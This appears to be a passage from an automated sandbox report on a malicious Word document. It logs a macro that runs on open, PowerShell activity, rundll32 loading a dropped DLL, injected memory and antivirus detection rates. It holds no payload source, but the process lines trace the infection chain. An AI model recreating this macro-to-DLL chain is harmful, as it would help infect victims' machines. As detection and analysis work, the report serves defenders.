Source: Yara match	File source: 14.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE

System Summary:

Very long command line found

Source: unknown	Process created: Commandline size = 5501
Source: unknown	Process created: Commandline size = 5400
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5400	Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Eeyfocnhd\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017D7D	7_2_10017D7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100189F6	7_2_100189F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007605	7_2_10007605
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000620A	7_2_1000620A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001F411	7_2_1001F411
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000F813	7_2_1000F813
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D013	7_2_1000D013
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008816	7_2_10008816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000421E	7_2_1000421E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C424	7_2_1001C424
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002628	7_2_10002628
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004A2B	7_2_10004A2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000DC2F	7_2_1000DC2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018831	7_2_10018831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007E34	7_2_10007E34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A83A	7_2_1000A83A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000903F	7_2_1000903F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014E4B	7_2_10014E4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000704B	7_2_1000704B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D44C	7_2_1000D44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C04C	7_2_1001C04C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005856	7_2_10005856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001658	7_2_10001658
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011259	7_2_10011259
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018668	7_2_10018668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C07D	7_2_1000C07D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014693	7_2_10014693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CAA0	7_2_1001CAA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004EA1	7_2_10004EA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008CA3	7_2_10008CA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C6AD	7_2_1001C6AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100056B3	7_2_100056B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015AB8	7_2_10015AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005EB9	7_2_10005EB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100106C2	7_2_100106C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009CC8	7_2_10009CC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D2CB	7_2_1001D2CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D0DE	7_2_1000D0DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009AE1	7_2_10009AE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100142E2	7_2_100142E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DEE8	7_2_1001DEE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100094EC	7_2_100094EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C6EF	7_2_1000C6EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CF11	7_2_1000CF11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015115	7_2_10015115
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001231B	7_2_1001231B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BF25	7_2_1001BF25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DB25	7_2_1001DB25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000492A	7_2_1000492A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D530	7_2_1001D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000213E	7_2_1000213E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CB42	7_2_1000CB42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10016B45	7_2_10016B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001654F	7_2_1001654F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003D4E	7_2_10003D4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018F65	7_2_10018F65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012965	7_2_10012965
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001676B	7_2_1001676B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10010F6D	7_2_10010F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011B71	7_2_10011B71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017570	7_2_10017570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A176	7_2_1000A176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DD78	7_2_1001DD78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10013D7C	7_2_10013D7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001E19F	7_2_1001E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100199A4	7_2_100199A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015DAA	7_2_10015DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001EDB9	7_2_1001EDB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006BC0	7_2_10006BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100173C0	7_2_100173C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100177C0	7_2_100177C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019DC0	7_2_10019DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100193C9	7_2_100193C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CDCC	7_2_1001CDCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000ADCE	7_2_1000ADCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B1D2	7_2_1001B1D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004BDE	7_2_10004BDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005BE1	7_2_10005BE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002DEE	7_2_10002DEE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100137F4	7_2_100137F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B3FE	7_2_1001B3FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 24_2_1000B9B3	24_2_1000B9B3

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: Mensaje-22-012021.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module M355vvc_qfa, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: Mensaje-22-012021.doc

OLE indicator, VBA macros: true

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@44/8@4/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$nsaje-22-012021.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDB9F.tmp

Jump to behavior

Source: Mensaje-22-012021.doc

OLE indicator, Word Document stream: true

Source: Mensaje-22-012021.doc	OLE document summary: title field not present or empty
Source: Mensaje-22-012021.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ........................................ ./......./.....................X...............#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ................H...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......h.\|.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................g1.j......................X.............}..v....x.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................g1.j..... X...............X.............}..v............0...............h.\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................1.j......................X.............}..v............0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................1.j....H.\|...............X.............}..v....h.......0.................\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................0.j......................X.............}..v.....S......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................0.j..... X...............X.............}..v.....S......0.................\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j....0J\|...............X.............}..v............0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............G..j....P.................X.............}..v............0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j....0J\|...............X.............}..v............0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............G..j....P.................X.............}..v............0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j....0J\|...............X.............}..v............0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............G..j....P.................X.............}..v............0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0................F\|.....(.......H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[...............G..j......................X.............}..v.... .......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.3.7.............}..v....0.......0................F\|.....$.......H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g...............G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v....h.......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j....0J\|...............X.............}..v....0&......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............G..j.....&................X.............}..v....h'......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j....0J\|...............X.............}..v....0.......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............G..j......................X.............}..v....h/......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j....0J\|...............X.............}..v....06......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............G..j.....6................X.............}..v....h7......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j....0J\|...............X.............}..v....0>......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............G..j.....>................X.............}..v....h?......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j....0J\|...............X.............}..v....0F......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............G..j.....F................X.............}..v....hG......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j....0J\|...............X.............}..v....0N......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............G..j.....N................X.............}..v....hO......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j....0J\|...............X.............}..v....0V......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............G..j.....V................X.............}..v....hW......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j....0J\|...............X.............}..v....0^......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............G..j.....^................X.............}..v....h_......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0f......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j.....f................X.............}..v....hg......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....0n......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j.....n................X.............}..v....ho......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v.....t......0.......................V.......H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j....8u................X.............}..v.....u......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v....`\|......0...............................H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j.....}................X.............}..v.....}......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....0J\|...............X.............}..v............0.......................r.......H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j......................X.............}..v.... .......0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ..........j....0J\|...............X.............}..v............0................F\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................G..j....h.................X.............}..v............0................G\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E.................X.............}..v.... .......0...............H.\|.............H...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E.................X.............}..v.....!......0...............H.\|.............H...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString

Source: Mensaje-22-012021.doc	Virustotal: Detection: 61%
Source: Mensaje-22-012021.doc	Metadefender: Detection: 32%
Source: Mensaje-22-012021.doc	ReversingLabs: Detection: 62%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
